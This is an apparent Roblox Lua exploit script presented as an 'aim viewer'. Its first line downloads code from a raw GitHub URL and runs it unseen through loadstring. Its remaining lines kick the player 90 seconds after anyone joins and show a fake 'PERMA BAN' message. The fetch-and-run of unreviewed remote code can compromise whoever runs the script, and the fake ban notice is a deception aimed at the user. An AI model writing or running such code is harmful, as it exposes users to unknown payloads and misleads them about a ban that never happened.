loadstring(game:HttpGet("https://raw.githubusercontent.com/zuwdaq/aim-viewer/main/aim%20viewer"))()
game.Players.PlayerAdded:Connect(function(plr)
    wait(90)
    game.Players.LocalPlayer:Kick("PERMA BAN")
end)
